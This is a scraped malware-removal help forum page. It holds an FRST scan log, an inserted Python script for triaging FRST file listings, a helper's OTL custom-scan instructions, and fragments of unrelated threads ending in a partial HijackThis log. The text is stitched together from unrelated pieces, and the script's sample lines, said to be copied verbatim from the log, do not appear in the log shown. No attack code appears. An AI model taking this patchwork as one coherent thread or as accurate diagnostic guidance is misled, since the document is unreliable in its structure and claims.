2014-05-10 20:46 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\tracing
2014-05-10 20:43 - 2014-03-22 08:06 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\Dropbox
2014-05-10 20:35 - 2014-05-10 20:35 - 00058704 _____ () C:\Users\AIR\Desktop\ark.txt
2014-05-10 19:45 - 2014-05-10 19:45 - 00380416 _____ () C:\Users\AIR\Desktop\63r8jur5.exe
2014-05-10 19:41 - 2014-05-10 19:41 - 00009613 _____ () C:\Users\AIR\Desktop\attach.txt
2014-05-10 19:40 - 2014-05-10 19:41 - 00027894 _____ () C:\Users\AIR\Desktop\dds.txt
2014-05-10 19:38 - 2014-05-10 19:38 - 00688992 ____R (Swearware) C:\Users\AIR\Desktop\dds.scr
2014-05-10 19:37 - 2014-05-10 19:37 - 00017745 _____ () C:\Users\AIR\Desktop\hijackthis.log
2014-05-10 19:35 - 2014-05-10 19:35 - 00388608 _____ (Trend Micro Inc.) C:\Users\AIR\Desktop\HijackThis.exe
2014-05-10 19:24 - 2013-03-25 22:41 - 04170752 ___SH () C:\Users\AIR\Desktop\Thumbs.db
2014-05-10 18:42 - 2013-10-05 23:06 - 00000848 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000Core.job
2014-05-10 18:30 - 2014-05-10 18:30 - 08326064 _____ (McAfee, Inc.) C:\Users\AIR\Desktop\SecurityScan_Release.exe
2014-05-10 17:50 - 2013-04-09 07:21 - 00000000 ____D () C:\ProgramData\MFAData
2014-05-10 17:26 - 2014-05-10 17:26 - 02347384 _____ (ESET) C:\Users\AIR\Desktop\esetsmartinstaller_enu.exe
2014-05-10 17:26 - 2014-05-10 17:26 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-05-10 17:24 - 2009-07-14 12:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-05-10 17:24 - 2009-07-14 12:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-05-10 17:20 - 2013-02-07 11:08 - 01334779 _____ () C:\Windows\WindowsUpdate.log
2014-05-10 17:18 - 2014-03-22 08:07 - 00000000 ___RD () C:\Users\AIR\Dropbox
2014-05-10 17:18 - 2013-04-13 16:18 - 00000000 ____D () C:\Program Files\SoftEther VPN Client
2014-05-10 17:18 - 2013-03-11 07:36 - 00000000 ____D () C:\Users\AIR\.gstreamer-0.10
2014-05-10 17:18 - 2013-03-11 07:32 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\MotoCast
2014-05-10 17:17 - 2013-02-13 15:48 - 00000532 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-05-10 17:17 - 2011-07-19 08:58 - 00000000 ____D () C:\ProgramData\PDFC
2014-05-10 17:16 - 2014-05-07 03:22 - 00001624 _____ () C:\Windows\setupact.log
2014-05-10 17:16 - 2013-04-14 14:21 - 00065536 _____ () C:\Windows\system32\Ikeext.etl
2014-05-10 17:16 - 2009-07-14 13:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-05-10 17:06 - 2013-10-06 17:50 - 00000000 ____D () C:\AdwCleaner
2014-05-10 17:00 - 2014-05-10 17:00 - 01316991 _____ () C:\Users\AIR\Desktop\AdwCleaner.exe
2014-05-10 16:55 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\AVG2014
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\TaobaoProtect
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Motorola Mobility
2014-05-10 16:55 - 2014-05-10 16:26 - 00000000 ____D () C:\Users\AIR_2
2014-05-10 16:55 - 2014-02-16 22:47 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-05-10 16:55 - 2013-02-08 08:04 - 00000000 ___HD () C:\GrandeDevice
2014-05-10 16:55 - 2013-02-07 11:09 - 00000000 ____D () C:\Users\AIR
2014-05-10 16:55 - 2009-07-14 11:20 - 00000000 __RHD () C:\Users\Public\Libraries
2014-05-10 16:55 - 2009-07-14 11:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-05-10 16:55 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\registration
2014-05-10 16:55 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\AppCompat
2014-05-10 16:29 - 2014-05-10 16:29 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\alipay
2014-05-10 16:29 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Google
2014-05-10 16:29 - 2014-05-10 16:26 - 00002193 _____ () C:\Users\AIR_2\Desktop\Google Chrome.lnk
2014-05-10 16:28 - 2014-05-10 16:28 - 00125000 _____ () C:\Users\AIR_2\AppData\Local\GDIPFONTCACHEV1.DAT
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Google
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\ATI
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\ATI
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 __SHD () C:\Users\AIR_2\AppData\Local\EmieUserList
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 __SHD () C:\Users\AIR_2\AppData\Local\EmieSiteList
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Apple Computer
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\PDFC
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Avg2014
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Adobe
2014-05-10 16:27 - 2014-05-10 16:26 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
2014-05-10 16:27 - 2014-05-10 16:26 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Adobe
2014-05-10 16:26 - 2014-05-10 16:26 - 00001327 _____ () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-05-10 16:26 - 2014-05-10 16:26 - 00000808 __RSH () C:\Users\AIR_2\ntuser.pol
2014-05-10 16:26 - 2014-05-10 16:26 - 00000020 ___SH () C:\Users\AIR_2\ntuser.ini
2014-05-10 16:25 - 2014-02-12 17:39 - 00178952 _____ () C:\Windows\PFRO.log
2014-05-10 16:22 - 2014-05-10 16:22 - 00000584 __RSH () C:\Users\AIR\ntuser.pol
2014-05-10 15:27 - 2013-03-24 15:22 - 00000898 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000Core.job
2014-05-10 01:26 - 2013-02-12 00:37 - 00000000 _____ () C:\sparkraw.log
2014-05-10 01:03 - 2013-02-20 20:19 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\iFunbox_UserCache
2014-05-09 21:25 - 2014-05-09 21:25 - 00012272 _____ () C:\Users\AIR\Desktop\fiesta mc list.xlsx
2014-05-09 21:11 - 2014-05-09 21:11 - 00090643 _____ () C:\Users\AIR\Desktop\67th Anniversary Concert_Food & Beverage_Sample.xlsx
2014-05-09 11:27 - 2013-02-27 18:47 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2014-05-09 11:26 - 2013-05-03 12:14 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-05-09 03:53 - 2013-02-15 20:26 - 00000000 ____D () C:\Users\AIR\AppData\Local\Adobe
2014-05-08 21:09 - 2014-02-10 10:49 - 00021699 _____ () C:\Windows\itrushwPTA.log
2014-05-08 07:18 - 2013-02-13 15:48 - 00003532 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-05-08 07:18 - 2013-02-13 15:48 - 00003280 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-05-07 18:37 - 2013-10-05 23:06 - 00003870 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000UA
2014-05-07 18:37 - 2013-10-05 23:06 - 00003474 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000Core
2014-05-07 06:24 - 2014-05-07 06:24 - 00000000 __SHD () C:\Users\AIR\AppData\Local\EmieUserList
2014-05-07 06:24 - 2014-05-07 06:24 - 00000000 __SHD () C:\Users\AIR\AppData\Local\EmieSiteList
2014-05-07 03:59 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\rescache
2014-05-07 03:22 - 2014-05-07 03:22 - 00000000 _____ () C:\Windows\setuperr.log
2014-05-07 03:19 - 2014-05-07 03:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-07 03:19 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\SysWOW64\zh-HK
2014-05-07 03:19 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-05-07 03:19 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-05-06 21:58 - 2013-03-01 08:35 - 00003174 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForAIR
2014-05-06 21:58 - 2013-03-01 08:35 - 00000324 _____ () C:\Windows\Tasks\HPCeeScheduleForAIR.job
2014-05-06 00:16 - 2013-10-18 00:39 - 00000000 ____D () C:\Users\AIR\Documents\Outlook 檔案
2014-05-05 11:14 - 2013-02-07 10:28 - 00000000 ____D () C:\Users\AIR\Documents\Mom
2014-05-05 08:55 - 2013-09-05 18:04 - 00000000 ___RD () C:\Users\AIR\Desktop\Aug2013
2014-05-03 22:50 - 2014-02-18 10:05 - 00000000 ____D () C:\Users\AIR\AppData\Local\alipay
2014-05-03 15:42 - 2014-02-02 13:24 - 00000000 ____D () C:\Users\AIR\Desktop\JVC_Cam
2014-05-03 10:01 - 2014-04-28 00:22 - 00002031 _____ () C:\Users\AIR\Documents\movie.wlmp
2014-05-03 09:59 - 2014-05-03 09:59 - 00000000 ____D () C:\Users\AIR\AppData\Local\{3682DD9A-1555-459A-84C9-46FBA34C3AFF}
2014-05-02 19:45 - 2014-03-22 08:06 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-05-02 19:45 - 2013-02-07 11:16 - 00000000 ___RD () C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-02 19:30 - 2013-09-03 20:55 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\vlc
2014-05-02 12:46 - 2014-05-02 12:46 - 00000000 ____D () C:\Users\AIR\AppData\Local\{E8E24688-FD0A-4605-81C2-280A86A79587}
2014-05-02 12:21 - 2011-07-19 08:28 - 00397026 _____ () C:\Windows\system32\prfh0404.dat
2014-05-02 12:21 - 2011-07-19 08:28 - 00132010 _____ () C:\Windows\system32\prfc0404.dat
2014-05-02 12:21 - 2009-07-14 13:13 - 01337534 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-05-01 07:51 - 2013-02-07 13:29 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\Mozilla
2014-04-30 07:55 - 2014-01-20 15:07 - 00102400 _____ () C:\Users\AIR\Documents\13-14 小學.xls
2014-04-30 07:01 - 2013-03-10 09:40 - 00003464 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-04-30 07:01 - 2013-02-12 01:14 - 00692400 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-04-30 07:01 - 2013-02-12 01:14 - 00070832 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-04-29 22:01 - 2014-05-07 14:31 - 23547904 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-04-29 21:40 - 2014-05-07 14:31 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-04-29 20:48 - 2014-05-07 14:31 - 17384448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-04-29 20:34 - 2014-05-07 14:31 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-04-29 18:42 - 2013-07-11 19:22 - 00000000 ____D () C:\Users\AIR\Desktop\ENGLISH SOCIETY
2014-04-28 21:38 - 2009-07-14 13:32 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-04-28 21:23 - 2014-04-28 21:23 - 07559143 _____ () C:\Users\AIR\Desktop\file_20140428.zip
2014-04-28 20:01 - 2013-04-13 12:43 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\uTorrent
2014-04-27 15:29 - 2014-04-27 15:29 - 00000000 ____D () C:\Users\AIR\AppData\Local\{17D1600E-66DF-4C31-A70C-41C04C20BED3}
2014-04-26 12:01 - 2014-01-27 13:48 - 00004716 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for AIR-HP-AIR AIR-HP
2014-04-25 10:52 - 2014-04-25 00:16 - 00000000 ____D () C:\Users\AIR\AppData\OICE_15_974FA576_32C1D314_28A8
2014-04-25 08:34 - 2014-04-01 08:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-04-24 16:45 - 2014-04-24 16:45 - 00001120 _____ () C:\Users\AIR\Desktop\501 - 捷徑.lnk
2014-04-24 16:45 - 2013-11-01 19:18 - 00000000 ____D () C:\Users\AIR\Desktop\Moto_Cam
2014-04-23 23:07 - 2014-04-23 23:00 - 00000000 ____D () C:\Users\AIR\Desktop\Moto Photo
2014-04-22 20:52 - 2013-05-22 13:44 - 00000000 ____D () C:\Users\AIR\Desktop\Practice
2014-04-22 15:15 - 2013-02-07 10:24 - 00000000 ____D () C:\Users\AIR\Desktop\Literature
2014-04-21 09:08 - 2014-04-21 09:08 - 14813831 _____ () C:\Users\AIR\Desktop\Mom.xcf
2014-04-20 17:44 - 2014-04-20 17:44 - 07559143 _____ () C:\Users\AIR\Desktop\file_20140420.zip
2014-04-20 17:09 - 2014-04-20 17:09 - 00000000 ____D () C:\ProgramData\Avg_Update_0414b
2014-04-18 15:01 - 2014-04-18 15:01 - 00237336 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgidsdrivera.sys
2014-04-17 02:16 - 2014-04-17 01:43 - 00000000 ____D () C:\FFOutput
2014-04-17 01:43 - 2014-04-17 01:42 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FormatFactory
2014-04-17 01:42 - 2014-04-17 01:42 - 00000000 ____D () C:\Program Files (x86)\FreeTime
2014-04-17 01:34 - 2014-04-17 01:34 - 00000000 ____D () C:\Users\AIR\AppData\Local\{45961A9D-70DF-42D2-91D4-BDC752BD64B7}
2014-04-17 01:34 - 2014-03-07 22:03 - 00000000 ____D () C:\Users\AIR\AppData\Local\Windows Live
2014-04-16 11:27 - 2013-02-08 12:27 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-04-16 11:22 - 2013-03-22 23:48 - 00000000 ____D () C:\Program Files\Microsoft Office 15
2014-04-15 09:26 - 2013-06-09 00:27 - 00003534 _____ () C:\Windows\System32\Tasks\AliUpdater{B46EAC48-AA8C-4A67-A782-738077F2149F}
2014-04-14 10:24 - 2014-05-06 23:42 - 00465408 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-04-14 10:19 - 2014-05-06 23:42 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll

Some content of TEMP:
====================
C:\Users\AIR\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpxmebbh.dll
C:\Users\AIR\AppData\Local\Temp\jna3790035305267919286.dll
C:\Users\AIR\AppData\Local\Temp\RightsNetworkCoreSetup_11.exe
C:\Users\AIR\AppData\Local\Temp\RightsNetworkMediaPlugIn_Setup_11_13.exe
C:\Users\AIR\AppData\Local\Temp\sqlite-3.6.20-sqlitejdbc.dll


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-05-09 13:30

==================== End Of Log ============================

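As an added example (not part of this thread, and not FRST's own logic), a small Python triage parser for the file listings above: it parses FRST's `created - modified - size attrs (company) path` lines, using lines copied from this log as sample input, and applies three heuristics of my own (GUID-named folders under AppData\Local, executables with no publisher inside a user profile, scheduled-task files touched in the window). Every hit is a lead for the person reading the log, not a verdict on the file.

```python
"""Triage helper for the "One Month Created/Modified Files and Folders"
listings in a Farbar Recovery Scan Tool (FRST) log. The heuristics below are
this example's own assumptions, not FRST's; a hit is a lead, never a verdict.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional, Tuple

# Sample input: lines copied verbatim from the FRST log posted in this thread.
SAMPLE_LOG = r"""
==================== One Month Modified Files and Folders =======

2014-05-10 21:42 - 2014-05-10 21:42 - 02065408 _____ (Farbar) C:\Users\AIR\Desktop\FRST64.exe
2014-05-10 21:36 - 2014-05-10 14:44 - 00003642 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-10 19:45 - 2014-05-10 19:45 - 00380416 _____ () C:\Users\AIR\Desktop\63r8jur5.exe
2014-05-10 19:38 - 2014-05-10 19:38 - 00688992 ____R (Swearware) C:\Users\AIR\Desktop\dds.scr
2014-05-07 03:02 - 2014-03-06 16:57 - 00548352 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-05-03 09:59 - 2014-05-03 09:59 - 00000000 ____D () C:\Users\AIR\AppData\Local\{3682DD9A-1555-459A-84C9-46FBA34C3AFF}
2014-04-24 16:45 - 2014-04-24 16:45 - 00001120 _____ () C:\Users\AIR\Desktop\501 - 捷徑.lnk
"""

# One listing line: "<created> - <modified> - <size> <attrs> (<company>) <path>"
LINE_RE = re.compile(
    r"^(?P<created>\d{4}-\d\d-\d\d \d\d:\d\d) - "
    r"(?P<modified>\d{4}-\d\d-\d\d \d\d:\d\d) - "
    r"(?P<size>\d{8}) (?P<attrs>[A-Z_]{5}) "
    r"\((?P<company>[^)]*)\) (?P<path>.+)$"
)
# A 36-character GUID used as a folder name directly under AppData\Local.
GUID_DIR_RE = re.compile(r"\\AppData\\Local\\\{[0-9A-Fa-f-]{36}\}$")
EXEC_EXT = (".exe", ".dll", ".scr", ".sys", ".cpl")
DATE_FMT = "%Y-%m-%d %H:%M"


@dataclass
class FrstEntry:
    created: datetime
    modified: datetime
    size: int
    attrs: str      # FRST attribute flags; a 'D' marks a directory
    company: str    # company name from version info, empty when absent
    path: str

    @property
    def is_dir(self) -> bool:
        return "D" in self.attrs

    @property
    def name(self) -> str:
        return self.path.rsplit("\\", 1)[-1]


def parse_frst_line(line: str) -> Optional[FrstEntry]:
    """Return an FrstEntry for one listing line; None for headers and blanks."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return FrstEntry(
        created=datetime.strptime(m["created"], DATE_FMT),
        modified=datetime.strptime(m["modified"], DATE_FMT),
        size=int(m["size"]),
        attrs=m["attrs"],
        company=m["company"],
        path=m["path"],
    )


def parse_frst_listing(text: str) -> List[FrstEntry]:
    """Parse every listing line in a block of FRST output, skipping the rest."""
    entries = (parse_frst_line(line) for line in text.splitlines())
    return [e for e in entries if e is not None]


def triage(entries: List[FrstEntry]) -> List[Tuple[str, FrstEntry]]:
    """Return (reason, entry) pairs for entries matching a heuristic, in log order."""
    findings = []
    for e in entries:
        low = e.path.lower()
        if e.is_dir:
            # Installers and some adware drop GUID-named folders here; worth a look.
            if GUID_DIR_RE.search(e.path):
                findings.append(("GUID-named folder under AppData\\Local", e))
            continue
        # Binaries in a user profile with no publisher in their version info.
        if low.endswith(EXEC_EXT) and not e.company and low.startswith("c:\\users\\"):
            findings.append(("executable with no publisher in a user profile", e))
        # Task files created or modified inside the one-month window.
        if "\\windows\\tasks\\" in low or "\\system32\\tasks\\" in low:
            findings.append(("scheduled task touched in the window", e))
    return findings


if __name__ == "__main__":
    for reason, entry in triage(parse_frst_listing(SAMPLE_LOG)):
        print(f"{reason}: {entry.path} (modified {entry.modified:%Y-%m-%d %H:%M})")
```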
Any spyware or malware in this HijackThis report??

Hiya

Sorry for the late reply, these forums are very busy :(

Are you still having this problem? If so, can you do the following for me:

Download Security Check from here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

------

Download OTL to your Desktop
(Vista or Win 7 => right click and Run As Administrator)
  • Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
  • When the window appears, underneath Output at the top change it to Standard Output.
  • At the top, check the box entitled Scan All Users
  • Toward the bottom, check:
    All Users
    LOP Check
    Purity Check
  • Under the Standard Registry box change it to All
    Do not change any settings unless otherwise told to do so.
  • Please copy the text in the code box below and paste it in the Custom Scans/Fixes box in OTL:

    Code:

    DRIVES
    netsvcs
    activex
    msconfig
    drivers32
    %systemroot%\assembly\GAC_32\*.ini
    %systemroot%\assembly\GAC_64\*.ini
    %ALLUSERSPROFILE%\Application Data\*.exe
    %APPDATA%\*.
    safebootminimal
    safebootnetwork
    %SYSTEMDRIVE%\*.*
    %PROGRAMFILES%\*.exe
    %LOCALAPPDATA%\*.exe
    %windir%\Installer\*.*
    %windir%\system32\tasks\*.*
    %windir%\system32\tasks\*.* /64
    %systemroot%\Fonts\*.exe
    %systemroot%\*. /mp /s
    /md5start
    pnrpnsp.dll
    nwprovau.dll
    nlaapi.dll
    napinsp.dll
    mswsock.dll
    winrnr.dll
    wshelper.dll
    consrv.dll
    explorer.exe
    winlogon.exe
    regedit.exe
    Userinit.exe
    svchost.exe
    services.exe
    user32.dll
    atapi.sys
    csrss.exe
    PRINTISOLATIONHOST.EXE
    /md5stop
    hklm\software\clients\startmenuinternet|command /rs
    hklm\software\clients\startmenuinternet|command /64 /rs
    %systemroot%\system32\*.dll /lockedfiles
    %systemroot%\Tasks\*.job /lockedfiles
    %systemdrive%\$Recycle.Bin|@;true;true;true /fp
    %systemroot%\system32\drivers\*.sys /lockedfiles
    C:\Windows\assembly\tmp\U\*.* /s
    %Temp%\smtmp\* \s
    %Temp%\smtmp\1\*.*
    %Temp%\smtmp\2\*.*
    %Temp%\smtmp\3\*.*
    %Temp%\smtmp\4\*.*
    dir "%systemdrive%\*" /S /A:L /C
    CREATERESTOREPOINT

  • Click the Run Scan button. The scan won't take long.
    A black box will appear; this is part of the custom scan, so don't be alarmed ;)
    IF OTL SAYS 'NOT RESPONDING' DON'T USE THE MOUSE. IT WILL CARRY ON SCANNING AFTER A FEW MINUTES

  • When the scan completes, it will open two Notepad windows: OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
  • Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them in your topic.

Thanks

eddie

NT Kernel & System hogs my CPU

Hey, I'm new and having a serious problem with my computer. The CPU is being used up by the NT Kernel & System and the percentage of time the processor is idle. I have tried checking for bad sectors in all my hard drives, I unplugged my graphics card, I updated all my drivers, restored my computer to Windows 7, wiped the data completely using diskpart, and it's still using almost all my CPU. I don't know what to do.

Specs are: AMD Phenom 9650 quad-core processor, 4 GB of RAM, NVIDIA Quadro FX 3800, 3 disk drives, Windows 7 SP1. I think that's all. Please help.

Version 2.0 UA for Android has stopped working.

Thanks for answering my question. I'm going to indicate that it has been solved since I will not be able to get to that PC until next October. I'll repost it then.

My IE 11 keeps resetting proxy server

Hyperlink Advertisement Virus

Hi, I have the same problem you seem to have fixed for user FisherMoon back on 26 April 2012.
I have a virus that, when I'm in a web browser, creates hyperlinks and advertisements out of all my web pages. Also, when I open a new web page or click anywhere, it loads a pop-up advertisement of some kind.

I have tried to run the same fix in OTS that you prescribed for him, but it doesn't seem to have worked. Could you please help me through this?

Also, I should note that I'm not an IT person at all, so my knowledge is very limited.

Thank you for your help.

Below are the files I think I'm supposed to send to you.

------------------

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:57:55 p.m., on 11/05/2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17041)
Boot mode: Normal

Running processes:
C:\Windows\SysWOW64\Rundll32.exe
C:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DPAgent.exe
C:\Users\adam.ransfield\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Users\adam.ransfield\AppData\Local\FilesFrog Update Checker\update_checker.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Users\adam.ransfield\AppData\Local\WebPlayer\FLV Player\WebPlayer.exe
C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Sophos\AutoUpdate\ALMon.exe
C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\Hewlett-Packard\Embedded Security Software\PSDrt.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\adam.ransfield\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://mail.google.com/mail/?shva=1#inbox
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Vuze Remote Toolbar - {ba14329e-9550-4989-b3f2-9732e92d17cc} - C:\Program Files (x86)\Vuze_Remote\prxtbVuze.dll
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: CrossriderApp0052466 - {11111111-1111-1111-1111-110511241166} - C:\Program Files (x86)\FLV Player Addon\FLV Player Addon-bho.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~1\Office14\GROOVEEX.DLL
